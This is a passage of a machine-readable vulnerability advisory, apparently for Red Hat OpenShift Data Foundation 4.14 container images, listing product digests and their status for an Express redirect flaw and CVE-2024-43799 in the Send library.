"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
